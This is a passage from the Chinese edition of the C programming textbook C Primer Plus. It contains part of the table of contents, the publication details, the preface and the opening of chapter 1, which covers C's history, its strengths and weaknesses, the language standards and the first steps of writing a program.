6.10.2 嵌套变式 6.11 数组简介 6.12 使用函数返回值的循环示例 6.12.1 程序分析 6.12.2 使用带返回值的函数 6.13 关键概念 6.14 本章小结 6.15 复习题 6.16 编程练习 第7章 C控制语句:分支和跳转 7.1 if语句 7.2 if else语句 7.2.1 另一个示例:介绍getchar()和putchar() 7.2.2 ctype.h系列的字符函数 7.2.3 多重选择else if 7.2.4 else与if配对 7.2.5 多层嵌套的if语句 7.3 逻辑运算符 7.3.1 备选拼写:iso646.h头文件 7.3.2 优先级 7.3.3 求值顺序 7.3.4 范围 7.4 一个统计单词的程序 7.5 条件运算符:?: 7.6 循环辅助:continue和break 7.6.1 continue语句 7.6.2 break语句 7 7.7 多重选择:switch和break 7.7.1 switch语句 7.7.2 只读每行的首字符 7.7.3 多重标签 7.7.4 switch和if else 7.8 goto语句 7.9 关键概念 7.10 本章小结 7.11 复习题 7.12 编程练习 第8章 字符输入/输出和输入验证 8.1 单字符I/O:getchar()和putchar() 8.2 缓冲区 8.3 结束键盘输入 8.3.1 文件、流和键盘输入 8.3.2 文件结尾 8.4 重定向和文件 8.5 创建更友好的用户界面 8.5.1 使用缓冲输入 8.5.2 混合数值和字符输入 8.6 输入验证 8.6.1 分析程序 8.6.2 输入流和数字 8.7 菜单浏览 8.7.1 任务 8.7.2 使执行更顺利 8.7.3 混合字符和数值输入 8.8 关键概念 8.9 本章小结 8.10 复习题 8.11 编程练习 第9章 函数 9.1 复习函数 8 9.1.1 创建并使用简单函数 9.1.2 分析程序 9.1.3 函数参数 9.1.4 定义带形式参数的函数 9.1.5 声明带形式参数函数的原型 9.1.6 调用带实际参数的函数 9.1.7 黑盒视角 9.1.8 使用return从函数中返回值 9.1.9 函数类型 9.2 ANSI C函数原型 9.2.1 问题所在 9.2.2 ANSI的解决方案 9.2.3 无参数和未指定参数 9.2.4 函数原型的优点 9.3 递归 9.3.1 演示递归 9.3.2 递归的基本原理 9.3.3 尾递归 9.3.4 递归和倒序计算 9.3.5 递归的优缺点 9.4 编译多源代码文件的程序 9.4.1 UNIX 9.4.2 Linux 9.4.3 DOS命令行编译器 9.4.4 Windows和苹果的IDE编译器 9.4.5 使用头文件 9.5 查找地址:&运算符 9.6 更改主调函数中的变量 9.7 指针简介 9.7.1 间接运算符:* 9.7.2 声明指针 9.7.3 使用指针在函数间通信 9.8 关键概念 9 9.9 本章小结 9.10 复习题 9.11 编程练习 第10章 数组和指针 10.1 数组 10.1.1 初始化数组 10.1.2 指定初始化器(C99) 10.1.3 
给数组元素赋值 10.1.4 数组边界 10.1.5 指定数组的大小 10.2 多维数组 10.2.1 初始化二维数组 10.2.2 其他多维数组 10.3 指针和数组 10.4 函数、数组和指针 10.4.1 使用指针形参 10.4.2 指针表示法和数组表示法 10.5 指针操作 10.6 保护数组中的数据 10.6.1 对形式参数使用const 10.6.2 const的其他内容 10.7 指针和多维数组 10.7.1 指向多维数组的指针 10.7.2 指针的兼容性 10.7.3 函数和多维数组 10.8 变长数组(VLA) 10.9 复合字面量 10.10 关键概念 10.11 本章小结 10.12 复习题 10.13 编程练习 第11章 字符串和字符串函数 11.1 表示字符串和字符串I/O 10 11.1.1 在程序中定义字符串 11.1.2 指针和字符串 11.2 字符串输入 11.2.1 分配空间 11.2.2 不幸的gets()函数 11.2.3 gets()的替代品 11.2.4 scanf()函数 11.3 字符串输出 11.3.1 puts()函数 11.3.2 fputs()函数 11.3.3 printf()函数 11.4 自定义输入/输出函数 11.5 字符串函数 11.5.1 strlen()函数 11.5.2 strcat()函数 11.5.3 strncat()函数 11.5.4 strcmp()函数 11.5.5 strcpy()和strncpy()函数 11.5.6 sprintf()函数 11.5.7 其他字符串函数 11.6 字符串示例:字符串排序 11.6.1 排序指针而非字符串 11.6.2 选择排序算法 11.7 ctype.h字符函数和字符串 11.8 命令行参数 11.8.1 集成环境中的命令行参数 11.8.2 Macintosh中的命令行参数 11.9 把字符串转换为数字 11.10 关键概念 11.11 本章小结 11.12 复习题 11.13 编程练习 第12章 存储类别、链接和内存管理 11 12.1 存储类别 12.1.1 作用域 12.1.2 链接 12.1.3 存储期 12.1.4 自动变量 12.1.5 寄存器变量 12.1.6 块作用域的静态变量 12.1.7 外部链接的静态变量 12.1.8 内部链接的静态变量 12.1.9 多文件 12.1.10 存储类别说明符 12.1.11 存储类别和函数 12.1.12 存储类别的选择 12.2 随机数函数和静态变量 12.3 掷骰子 12.4 分配内存:malloc()和free() 12.4.1 free()的重要性 12.4.2 calloc()函数 12.4.3 动态内存分配和变长数组 12.4.4 存储类别和动态内存分配 12.5 ANSI C类型限定符 12.5.1 const类型限定符 12.5.2 volatile类型限定符 12.5.3 restrict类型限定符 12.5.4 _Atomic类型限定符(C11) 12.5.5 旧关键字的新位置 12.6 关键概念 12.7 本章小结 12.8 复习题 12.9 编程练习 第13章 文件输入/输出 13.1 与文件进行通信 13.1.1 文件是什么 12 13.1.2 文本模式和二进制模式 13.1.3 I/O的级别 13.1.4 标准文件 13.2 标准I/O 13.2.1 检查命令行参数 13.2.2 fopen()函数 13.2.3 getc()和putc()函数 13.2.4 文件结尾 13.2.5 fclose()函数 13.2.6 指向标准文件的指针 13.3 一个简单的文件压缩程序 13.4 文件I/O:fprintf()、fscanf()、fgets()和fputs() 13.4.1 fprintf()和fscanf()函数 13.4.2 fgets()和fputs()函数 13.5 随机访问:fseek()和ftell() 13.5.1 fseek()和ftell()的工作原理 13.5.2 二进制模式和文本模式 13.5.3 可移植性 13.5.4 fgetpos()和fsetpos()函数 13.6 标准I/O的机理 13.7 其他标准I/O函数 13.7.1 int ungetc(int c, FILE *fp)函数 13.7.2 int fflush()函数 13.7.3 int setvbuf()函数 13.7.4 二进制I/O:fread()和fwrite() 13.7.5 size_t fwrite()函数 13.7.6 size_t fread()函数 13.7.7 int feof(FILE *fp)和int ferror(FILE *fp)函数 13.7.8 一个程序示例 13.7.9 用二进制I/O进行随机访问 13.8 关键概念 13.9 本章小结 13.10 复习题 13 13.11 编程练习 第14章 结构和其他数据形式 14.1 示例问题:创建图书目录 14.2 建立结构声明 14.3 定义结构变量 14.3.1 初始化结构 14.3.2 访问结构成员 14.3.3 结构的初始化器 14.4 结构数组 14.4.1 声明结构数组 14.4.2 标识结构数组的成员 14.4.3 程序讨论 14.5 嵌套结构 14.6 指向结构的指针 14.6.1 声明和初始化结构指针 14.6.2 用指针访问成员 14.7 向函数传递结构的信息 14.7.1 传递结构成员 14.7.2 传递结构的地址 14.7.3 传递结构 14.7.4 其他结构特性 14.7.5 结构和结构指针的选择 14.7.6 结构中的字符数组和字符指针 14.7.7 结构、指针和malloc() 14.7.8 复合字面量和结构(C99) 14.7.9 伸缩型数组成员(C99) 14.7.10 匿名结构(C11) 14.7.11 使用结构数组的函数 14.8 把结构内容保存到文件中 14.8.1 保存结构的程序示例 14.8.2 程序要点 14.9 链式结构 14.10 联合简介 14 14.10.1 使用联合 14.10.2 匿名联合(C11) 14.11 枚举类型 14.11.1 enum常量 14.11.2 默认值 14.11.3 赋值 14.11.4 enum的用法 14.11.5 共享名称空间 14.12 typedef简介 14.13 其他复杂的声明 14.14 函数和指针 14.15 关键概念 14.16 本章小结 14.17 复习题 14.18 编程练习 第15章 位操作 15.1 二进制数、位和字节 15.1.1 二进制整数 15.1.2 有符号整数 15.1.3 二进制浮点数 15.2 其他进制数 15.2.1 八进制 15.2.2 十六进制 15.3 C按位运算符 15.3.1 按位逻辑运算符 15.3.2 用法:掩码 15.3.3 用法:打开位(设置位) 15.3.4 用法:关闭位(清空位) 15.3.5 用法:切换位 15.3.6 用法:检查位的值 15.3.7 移位运算符 15.3.8 编程示例 15.3.9 另一个例子 15 15.4 位字段 15.4.1 位字段示例 15.4.2 位字段和按位运算符 15.5 对齐特性(C11) 15.6 关键概念 15.7 本章小结 15.8 复习题 15.9 编程练习 第16章 C预处理器和C库 16.1 翻译程序的第一步 16.2 明示常量:#define 16.2.1 记号 16.2.2 重定义常量 16.3 在#define中使用参数 16.3.1 用宏参数创建字符串:#运算符 16.3.2 预处理器黏合剂:##运算符 16.3.3 变参宏:...和_ _VA_ARGS_ _ 16.4 宏和函数的选择 16.5 文件包含:#include 16.5.1 头文件示例 16.5.2 使用头文件 16.6 其他指令 16.6.1 #undef指令 16.6.2 从C预处理器角度看已定义 16.6.3 条件编译 16.6.4 预定义宏 16.6.5 #line和#error 16.6.6 #pragma 16.6.7 泛型选择(C11) 16.7 内联函数(C99) 16.8 _Noreturn函数(C11) 16.9 C库 16.9.1 访问C库 16 16.9.2 使用库描述 16.10 数学库 16.10.1 
三角问题 16.10.2 类型变体 16.10.3 tgmath.h库(C99) 16.11 通用工具库 16.11.1 exit()和atexit()函数 16.11.2 qsort()函数 16.12 断言库 16.12.1 assert的用法 16.12.2 _Static_assert(C11) 16.13 string.h库中的memcpy()和memmove() 16.14 可变参数:stdarg.h 16.15 关键概念 16.16 本章小结 16.17 复习题 16.18 编程练习 第17章高级数据表示 17.1 研究数据表示 17.2 从数组到链表 17.2.1 使用链表 17.2.2 反思 17.3 抽象数据类型(ADT) 17.3.1 建立抽象 17.3.2 建立接口 17.3.3 使用接口 17.3.4 实现接口 17.4 队列ADT 17.4.1 定义队列抽象数据类型 17.4.2 定义一个接口 17.4.3 实现接口数据表示 17.4.4 测试队列 17.5 用队列进行模拟 17 17.6 链表和数组 17.7 二叉查找树 17.7.1 二叉树ADT 17.7.2 二叉查找树接口 17.7.3 二叉树的实现 17.7.4 使用二叉树 17.7.5 树的思想 17.8 其他说明 17.9 关键概念 17.10 本章小结 17.11 复习题 17.12 编程练习 附录A 复习题答案 附录B 参考资料 B.1 参考资料I:补充阅读 B.2 参考资料II:C运算符 B.3 参考资料III:基本类型和存储类别 B.4 参考资料IV:表达式、语句和程序流 B.5 参考资料V:新增C99和C11的ANSI C库 B.6 参考资料VI:扩展的整数类型 B.7 参考资料VII:扩展字符支持 B.8 参考资料VIII:C99/C11数值计算增强 B.9 参考资料IX:C和C++的区别 18 PEARSON CPrimer Plus(第6版)中文版 [美]Stephen Prata 著 姜佑 译 人民邮电出版社 北京 19 图书在版编目(CIP)数据 C Primer Plus(第6版)中文版/(美)普拉达(Prata,S.)著;姜佑译.-- 北京:人民邮电出版社,2016.4 ISBN 978-7-115-39059-2 Ⅰ.①C… Ⅱ.①普…②姜… Ⅲ.①C语言—程序设计 Ⅳ.①TP312 中国版本图书馆CIP数据核字(2015)第084602号 版权声明 Authorized translation from the English language edition,entitled C Primer Plus(sixth edition),9780321928429 by Stephen Prata,published by Pearson Education,Inc.,publishing as Addison-Wesley,Copyright©2014 Pearson Education,Inc. All rights reserved.No part of this book may be reproduced or transmitted in any form or by any means,electronic or mechanical,including photocopying,recording or by any information storage retrieval system,without permission from Pearson Education Inc.CHINESE SIMPLIFIED language edition published by PEARSON EDUCATION ASIA LTD.,and POSTS & TELECOMMUNICATIONS PRESS Copyright©2015. 本书封面贴有Pearson Education(培生教育出版集团)激光防伪标 签。无标签者不得销售。 ◆著 [美]Stephen Prata 译 姜佑 责任编辑 傅道坤 责任印制 张佳莹 焦志炜 20 ◆人民邮电出版社出版发行  北京市丰台区成寿寺路11号 邮编 100164  电子邮件 315@ptpress.com.cn 网址 http://www.ptpress.com.cn 北京圣夫亚美印刷有限公司印刷 ◆开本:787×1092 1/16 印张:47 字数:1412千字  2016年4月第1版 印数:1-8000册  2016年4月北京第1次印刷 著作权合同登记号 图字:01-2014-5617号 定价:89.00元 读者服务热线:(010)81055410 印装质量热线:(010)81055316 反盗版热线:(010)81055315 21 内容提要 本书详细讲解了C语言的基本概念和编程技巧。 全书共17章。第1章、第2章介绍了C语言编程的预备知识。第3章~第 15章详细讲解了C语言的相关知识,包括数据类型、格式化输入/输出、运算 符、表达式、语句、循环、字符输入和输出、函数、数组和指针、字符和字 符串函数、内存管理、文件输入输出、结构、位操作等。第16章、第17章介 绍C预处理器、C库和高级数据表示。本书以完整的程序为例,讲解C语言的 知识要点和注意事项。每章末尾设计了大量复习题和编程练习,帮助读者巩 固所学知识和提高实际编程能力。附录给出了各章复习题的参考答案和丰富 的参考资料。 本书可作为C语言的教材,适用于需要系统学习C语言的初学者,也适 用于巩固C语言知识或希望进一步提高编程技术的程序员。 22 作者简介 Stephen Prata曾在加利福尼亚的马林学院(肯特菲尔德)教授天文学、 物理学和程序设计课程,现已退休。他在加州理工学院获得学士学位,在加 州大学伯克利分校获得博士学位。他最早接触程序设计,是为了利用计算机 给星团建模。Stephen撰写和与他人合著了十几本图书,其中包括C++Primer Plus和UNIX Primer Plus。 献辞 谨将本书献给我的父亲William Prata。 致谢 感谢Pearson的Mark Taber一直都非常关注本书。感谢Danny Kalev在技术 上提供的帮助和建议。 23 前言 1984年C Primer Plus第1版刚问世时,使用C语言编程的人并不多。C语 言从那时开始流行,许多人在本书的帮助下掌握了C语言。实际上,C Primer Plus各个版本累计销售量已超过55万册。 C语言从早期的非正式的K&R标准,发展到1990 ISO/ANSI标准,进而 发展到2011 ISO/IEC标准。本书也随着逐渐成熟,发展到现在的第 6 版。在 所有这些版本中,我的目标是致力于编写一本指导性强、条理清晰而且有用 的C语言教程。 本书的用法和目标 我希望撰写一本友好、方便使用、便于自学的指南。为此,本书采用以 下写作策略。 在介绍C语言细节的同时,讲解编程概念。本书假定读者为非专业的程 序员。 每次尽量用短小简单的示例演示一两个概念,学以致用是最有效的学习 方式之一。 当概念用文字较难解释时,则用图表演示以帮助读者理解。 C语言的主要特性总结在方框中,便于查找和复习。 每章末尾设有复习题和编程练习,帮助读者测试和加深对C语言的理 解。 为了获得最佳的学习效果,学习本书时,读者应尽量扮演一个积极的角 色。不仅要仔细阅读程序示例,还要亲自动手录入程序并运行。C 是一种可 移植性很高的语言,但有时在你的系统中运行的结果和在我们的系统中运行 的结果不同。经常改动程序的某些部分,运行后看看有什么效果。偶尔出现 24 警告也不必理会,主要是看一下执行错误操作会出现什么状况。在学习的过 程中应该多提出问题和多练习。用得越多,学的知识就越牢固。 希望本书能帮助读者轻松愉快地学习C语言。 25 第1章 初识C语言 本章介绍以下内容: C的历史和特性 编写程序的步骤 编译器和链接器的一些知识 C标准 欢迎来到C语言的世界。C是一门功能强大的专业化编程语言,深受业 余编程爱好者和专业程序员的喜爱。本章为读者学习这一强大而流行的语言 打好基础,并介绍几种开发C程序最可能使用的环境。 我们先来了解C语言的起源和一些特性,包括它的优缺点。然后,介绍 编程的起源并探讨一些编程的基本原则。最后,讨论如何在一些常见系统中 运行C程序。 26 1.1 C语言的起源 
1972年,贝尔实验室的丹尼斯·里奇(Dennis Ritch)和肯·汤普逊(Ken Thompson)在开发UNIX操作系统时设计了C语言。然而,C语言不完全是里 奇突发奇想而来,他是在B语言(汤普逊发明)的基础上进行设计。至于 B 语言的起源,那是另一个故事。C 语言设计的初衷是将其作为程序员使用的 一种编程工具,因此,其主要目标是成为有用的语言。 虽然绝大多数语言都以实用为目标,但是通常也会考虑其他方面。例 如,Pascal 的主要目标是为更好地学习编程原理提供扎实的基础;而BASIC 的主要目标是开发出类似英文的语言,让不熟悉计算机的学生轻松学习编 程。这些目标固然很重要,但是随着计算机的迅猛发展,它们已经不是主流 语言。然而,最初为程序员设计开发的C语言,现在已成为首选的编程语言 之一。 27 1.2 选择C语言的理由 在过去40多年里,C语言已成为最重要、最流行的编程语言之一。它的 成长归功于使用过的人都对它很满意。过去20多年里,虽然许多人都从C语 言转而使用其他编程语言(如,C++、Objective C、Java等),但是C语言仍 凭借自身实力在众多语言中脱颖而出。在学习C语言的过程中,会发现它的 许多优点(见图1.1)。下面,我们来看看其中较为突出的几点。 1.2.1 设计特性 C是一门流行的语言,融合了计算机科学理论和实践的控制特性。C语 言的设计理念让用户能轻松地完成自顶向下的规划、结构化编程和模块化设 计。因此,用C语言编写的程序更易懂、更可靠。 1.2.2 高效性 C是高效的语言。在设计上,它充分利用了当前计算机的优势,因此 C 程序相对更紧凑,而且运行速度很快。实际上,C 语言具有通常是汇编语言 才具有的微调控制能力(汇编语言是为特殊的中央处理单元设计的一系列内 部指令,使用助记符来表示;不同的 CPU 系列使用不同的汇编语言),可 以根据具体情况微调程序以获得最大运行速度或最有效地使用内存。 28 图1.1 C语言的优点 1.2.3 可移植性 C是可移植的语言。这意味着,在一种系统中编写的 C程序稍作修改或 不修改就能在其他系统运行。如需修改,也只需简单更改主程序头文件中的 少许项即可。大部分语言都希望成为可移植语言,但是,如果经历过把IBM PC BASIC程序转换成苹果BASIC(两者是近亲),或者在UNIX系统中运行 IBM大型机的FORTRAN程序的人都知道,移植是最麻烦的事。C语言是可移 植方面的佼佼者。从8位微处理器到克雷超级计算机,许多计算机体系结构 29 都可以使用C编译器(C编译器是把C代码转换成计算机内部指令的程序)。 但是要注意,程序中针对特殊硬件设备(如,显示监视器)或操作系统特殊 功能(如,Windows 8或OS X)编写的部分,通常是不可移植的。 由于C语言与UNIX关系密切,UNIX系统通常会将C编译器作为软件包的 一部分。安装Linux时,通常也会安装C编译器。供个人计算机使用的C编译 器很多,运行各种版本的Windows和Macintosh(即, Mac)的PC都能找到 合适的C编译器。因此,无论是使用家庭计算机、专业工作站,还是大型 机,都能找到针对特定系统的C编译器。 1.2.4 强大而灵活 C语言功能强大且灵活(计算机领域经常使用这两个词)。例如,功能 强大且灵活的UNIX操作系统,大部分是用C语言写的;其他语言(如, FORTRAN、Perl、Python、Pascal、LISP、Logo、BASIC)的许多编译器和 解释器都是用C语言编写的。因此,在UNIX机上使用FORTRAN时,最终是 由C程序生成最后的可执行程序。C程序可以用于解决物理学和工程学的问 题,甚至可用于制作电影的动画特效。 1.2.5 面向程序员 C 语言是为了满足程序员的需求而设计的,程序员利用 C 可以访问硬 件、操控内存中的位。C 语言有丰富的运算符,能让程序员简洁地表达自己 的意图。C没有Pascal严谨,但是却比C++的限制多。这样的灵活性既是优点 也是缺点。优点是,许多任务用C来处理都非常简洁(如,转换数据的格 式);缺点是,你可能会犯一些莫名其妙的错误,这些错误不可能在其他语 言中出现。C 语言在提供更多自由的同时,也让使用者承担了更大的责任。 另外,大多数C实现都有一个大型的库,包含众多有用的C函数。这些 函数用于处理程序员经常需要解决的问题。 1.2.6 缺点 30 人无完人,金无足赤。C语言也有一些缺点。例如,前面提到的,要享 受用C语言自由编程的乐趣,就必须承担更多的责任。特别是,C语言使用 指针,而涉及指针的编程错误往往难以察觉。有句话说的好:想拥有自由就 必须时刻保持警惕。 C 语言紧凑简洁,结合了大量的运算符。正因如此,我们也可以编写出 让人极其费解的代码。虽然没必要强迫自己编写晦涩的代码,但是有兴趣写 写也无妨。试问,除 C语言外还为哪种语言举办过年度混乱代码大赛[1]? 
瑕不掩瑜,C语言的优点比缺点多很多。我们不想在这里多费笔墨,还 是来聊聊C语言的其他话题。 31 1.3 C语言的应用范围 早在20世纪80年代,C语言就已经成为小型计算机(UNIX系统)使用的 主流语言。从那以后,C语言的应用范围扩展到微型机(个人计算机)和大 型机(庞然大物)。如图1.2所示,许多软件公司都用C语言来开发文字处理 程序、电子表格、编译器和其他产品,因为用 C语言编写的程序紧凑而高 效。更重要的是,C程序很方便修改,而且移植到新型号的计算机中也没什 么问题。 无论是软件公司、经验丰富的C程序员,还是其他用户,都能从C语言 中受益。越来越多的计算机用户已转而求助C语言解决一些安全问题。不一 定非得是计算机专家也能使用C语言。 20世纪90年代,许多软件公司开始改用C++来开发大型的编程项目。 C++在C语言的基础上嫁接了面向对象编程工具(面向对象编程是一门哲 学,它通过对语言建模来适应问题,而不是对问题建模以适应语言)。 C++几乎是C的超集,这意味着任何C程序差不多就是一个C++程序。学习C 语言,也相当于学习了许多C++的知识。 32 图1.2 C语言的应用范围 虽然这些年来C++和JAVA非常流行,但是C语言仍是软件业中的核心技 能。在最想具备的技能中,C语言通常位居前十。特别是,C 语言已成为嵌 入式系统编程的流行语言。也就是说,越来越多的汽车、照相机、DVD 播 放机和其他现代化设备的微处理器都用 C 语言进行编程。除此之外,C 语 言还从长期被FORTRAN独占的科学编程领域分得一杯羹。最终,作为开发 操作系统的卓越语言,C在Linux开发中扮演着极其重要的角色。因此,在进 入21世纪的第2个10年中,C语言仍然保持着强劲的势头。 简而言之,C 语言是最重要的编程语言之一,将来也是如此。如果你想 33 拿下一份编程的工作,被问到是否会C语言时,最好回答“是”。 34 1.4 计算机能做什么 在学习如何用C语言编程之前,最好先了解一下计算机的工作原理。这 些知识有助于你理解用C语言编写程序和运行C程序时所发生的事情之间有 什么联系。 现代的计算机由多种部件构成。中央处理单元(CPU)承担绝大部分的 运算工作。随机存取内存(RAM)是存储程序和文件的工作区;而永久内 存存储设备(过去一般指机械硬盘,现在还包括固态硬盘)即使在关闭计算 机后,也不会丢失之前储存的程序和文件。另外,还有各种外围设备(如, 键盘、鼠标、触摸屏、监视器)提供人与计算机之间的交互。CPU负责处理 程序,接下来我们重点讨论它的工作原理。 CPU 的工作非常简单,至少从以下简短的描述中看是这样。它从内存 中获取并执行一条指令,然后再从内存中获取并执行下一条指令,诸如此类 (一个吉赫兹的CPU一秒钟能重复这样的操作大约十亿次,因此,CPU 能以 惊人的速度从事枯燥的工作)。CPU 有自己的小工作区——由若干个寄存 器组成,每个寄存器都可以储存一个数字。一个寄存器储存下一条指令的内 存地址,CPU 使用该地址来获取和更新下一条指令。在获取指令后,CPU在 另一个寄存器中储存该指令,并更新第1个寄存器储存下一条指令的地址。 CPU能理解的指令有限(这些指令的集合叫作指令集)。而且,这些指令相 当具体,其中的许多指令都是用于请求计算机把一个数字从一个位置移动到 另一个位置。例如,从内存移动到寄存器。 下面介绍两个有趣的知识。其一,储存在计算机中的所有内容都是数 字。计算机以数字形式储存数字和字符(如,在文本文档中使用的字母)。 每个字符都有一个数字码。计算机载入寄存器的指令也以数字形式储存,指 令集中的每条指令都有一个数字码。其二,计算机程序最终必须以数字指令 码(即,机器语言)来表示。 简而言之,计算机的工作原理是:如果希望计算机做某些事,就必须为 其提供特殊的指令列表(程序),确切地告诉计算机要做的事以及如何做。 35 你必须用计算机能直接明白的语言(机器语言)创建程序。这是一项繁琐、 乏味、费力的任务。计算机要完成诸如两数相加这样简单的事,就得分成类 似以下几个步骤。 1.从内存位置2000上把一个数字拷贝到寄存器1。 2.从内存位置2004上把另一个数字拷贝到寄存器2。 3.把寄存器2中的内容与寄存器1中的内容相加,把结果储存在寄存器1 中。 4.把寄存器1中的内容拷贝到内存位置2008。 而你要做的是,必须用数字码来表示以上的每个步骤! 
如果以这种方式编写程序很合你的意,那不得不说抱歉,因为用机器语 言编程的黄金时代已一去不复返。但是,如果你对有趣的事情比较感兴趣, 不妨试试高级编程语言。 36 1.5 高级计算机语言和编译器 高级编程语言(如,C)以多种方式简化了编程工作。首先,不必用数 字码表示指令;其次,使用的指令更贴近你如何想这个问题,而不是类似计 算机那样繁琐的步骤。使用高级编程语言,可以在更抽象的层面表达你的想 法,不用考虑CPU在完成任务时具体需要哪些步骤。例如,对于两数相加, 可以这样写: total = mine + yours; 对我们而言,光看这行代码就知道要计算机做什么;而看用机器语言写 成的等价指令(多条以数字码形式表现的指令)则费劲得多。但是,对计算 机而言却恰恰相反。在计算机看来,高级指令就是一堆无法理解的无用数 据。编译器在这里派上了用场。编译器是把高级语言程序翻译成计算机能理 解的机器语言指令集的程序。程序员进行高级思维活动,而编译器则负责处 理冗长乏味的细节工作。 编译器还有一个优势。一般而言,不同CPU制造商使用的指令系统和编 码格式不同。例如,用Intel Core i7 (英特尔酷睿i7)CPU编写的机器语言程 序对于ARM Cortex-A57 CPU而言什么都不是。但是,可以找到与特定类型 CPU匹配的编译器。因此,使用合适的编译器或编译器集,便可把一种高级 语言程序转换成供各种不同类型 CPU 使用的机器语言程序。一旦解决了一 个编程问题,便可让编译器集翻译成不同 CPU 使用的机器语言。 简而言之,高级语言(如C、Java、Pascal)以更抽象的方式描述行 为,不受限于特定CPU或指令集。而且,高级语言简单易学,用高级语言编 程比用机器语言编程容易得多。 1964年,控制数据公司(Control Data Corporation)研制出了CDC 6600 计算机。这台庞然大物是世界上首台超级计算机,当时的售价是600万美 元。它是高能核物理研究的首选。然而,现在的普通智能手机在计算能力和 内存方面都超过它数百倍,而且能看视频,放音乐。 37 1964 年,在工程和科学领域的主流编程语言是 FORTRAN。虽然编程语 言不如硬件发展那么突飞猛进,但是也发生了很大变化。为了应对越来越大 型的编程项目,语言先后为结构化编程和面向对象编程提供了更多的支持。 随着时间的推移,不仅新语言层出不穷,而且现有语言也会发生变化。 38 1.6 语言标准 目前,有许多C实现可用。在理想情况下,编写C程序时,假设该程序 中未使用机器特定的编程技术,那么它的运行情况在任何实现中都应该相 同。要在实践中做到这一点,不同的实现要遵循同一个标准。 C语言发展之初,并没有所谓的C标准。1987年,布莱恩·柯林汉(Brian Kernighan)和丹尼斯·里奇(Dennis Ritchie)合著的The C Programming Language(《C语言程序设计》)第1版是公认的C标准,通常称之为K&R C 或经典C。特别是,该书中的附录中的“C语言参考手册”已成为实现C的指导 标准。例如,编译器都声称提供完整的K&R实现。虽然这本书中的附录定 义了C语言,但却没有定义C库。与大多数语言不同的是,C语言比其他语言 更依赖库,因此需要一个标准库。实际上,由于缺乏官方标准,UNIX实现 提供的库已成为了标准库。 1.6.1 第1个ANSI/ISO C标准 随着C的不断发展,越来越广泛地应用于更多系统中,C社区意识到需 要一个更全面、更新颖、更严格的标准。鉴于此,美国国家标准协会 (ANSI)于 1983 年组建了一个委员会(X3J11),开发了一套新标准,并 于1989年正式公布。该标准(ANSI C)定义了C语言和C标准库。国际标准 化组织于1990年采用了这套C标准(ISO C)。ISO C和ANSI C是完全相同的 标准。ANSI/ISO标准的最终版本通常叫作C89(因为ANSI于1989年批准该标 准)或C90(因为ISO于1990年批准该标准)。另外,由于ANSI先公布C标 准,因此业界人士通常使用ANSI C。 在该委员会制定的指导原则中,最有趣的可能是:保持 C的精神。委员 会在表述这一精神时列出了以下几点: 信任程序员; 不要妨碍程序员做需要做的事; 39 保持语言精练简单; 只提供一种方法执行一项操作; 让程序运行更快,即使不能保证其可移植性。 在最后一点上,标准委员会的用意是:作为实现,应该针对目标计算机 来定义最合适的某特定操作,而不是强加一个抽象、统一的定义。在学习C 语言过程中,许多方面都反映了这一哲学思想。 1.6.2 C99标准 1994年,ANSI/ISO联合委员会(C9X委员会)开始修订C标准,最终发 布了C99标准。该委员会遵循了最初C90标准的原则,包括保持语言的精练 简单。委员会的用意不是在C语言中添加新特性,而是为了达到新的目标。 第1个目标是,支持国际化编程。例如,提供多种方法处理国际字符集。第2 个目标是,“调整现有实践致力于解决明显的缺陷”。因此,在遇到需要将C 移至64位处理器时,委员会根据现实生活中处理问题的经验来添加标准。第 3个目标是,为适应科学和工程项目中的关键数值计算,提高C的适应性, 让C比FORTRAN更有竞争力。 这3点(国际化、弥补缺陷和提高计算的实用性)是主要的修订目标。 在其他方面的改变则更为保守,例如,尽量与C90、C++兼容,让语言在概 念上保持简单。用委员会的话说:“„„委员会很满意让C++成为大型、功能 强大的语言”。 C99的修订保留了C语言的精髓,C仍是一门简洁高效的语言。本书指出 了许多C99修改的地方。虽然该标准已发布了很长时间,但并非所有的编译 器都完全实现C99的所有改动。因此,你可能发现C99的一些改动在自己的 系统中不可用,或者只有改变编译器的设置才可用。 1.6.3 C11标准 维护标准任重道远。标准委员会在2007年承诺C标准的下一个版本是 40 C1X,2011年终于发布了C11标准。此次,委员会提出了一些新的指导原 则。出于对当前编程安全的担忧,不那么强调“信任程序员”目标了。而且, 供应商并未像对C90那样很好地接受和支持C99。这使得C99的一些特性成为 C11的可选项。因为委员会认为,不应要求服务小型机市场的供应商支持其 目标环境中用不到的特性。另外需要强调的是,修订标准的原因不是因为原 标准不能用,而是需要跟进新的技术。例如,新标准添加了可选项支持当前 使用多处理器的计算机。对于C11标准,我们浅尝辄止,深入分析这部分内 容已超出本书讨论的范围。 注意 本书使用术语ANSI C、ISO C或ANSI/ISO C讲解C89/90和较新标准共有 的特性,用C99或C11介绍新的特性。有时也使用C90(例如,讨论一个特性 被首次加入C语言时)。 41 1.7 使用C语言的7个步骤 C是编译型语言。如果之前使用过编译型语言(如,Pascal或 FORTRAN),就会很熟悉组建C程序的几个基本步骤。但是,如果以前使 用的是解释型语言(如,BASIC)或面向图形界面语言(如,Visual Basic),或者甚至没接触过任何编程语言,就有必要学习如何编译。别担 心,这并不复杂。首先,为了让读者对编程有大概的了解,我们把编写C程 序的过程分解成7个步骤(见图1.3)。注意,这是理想状态。在实际的使用 过程中,尤其是在较大型的项目中,可能要做一些重复的工作,根据下一个 步骤的情况来调整或改进上一个步骤。 图1.3 编程的7个步骤 1.7.1 第1步:定义程序的目标 42 在动手写程序之前,要在脑中有清晰的思路。想要程序去做什么首先自 己要明确自己想做什么,思考你的程序需要哪些信息,要进行哪些计算和控 制,以及程序应该要报告什么信息。在这一步骤中,不涉及具体的计算机语 言,应该用一般术语来描述问题。 1.7.2 第2步:设计程序 对程序应该完成什么任务有概念性的认识后,就应该考虑如何用程序来 完成它。例如,用户界面应该是怎样的?如何组织程序?目标用户是谁?准 备花多长时间来完成这个程序? 
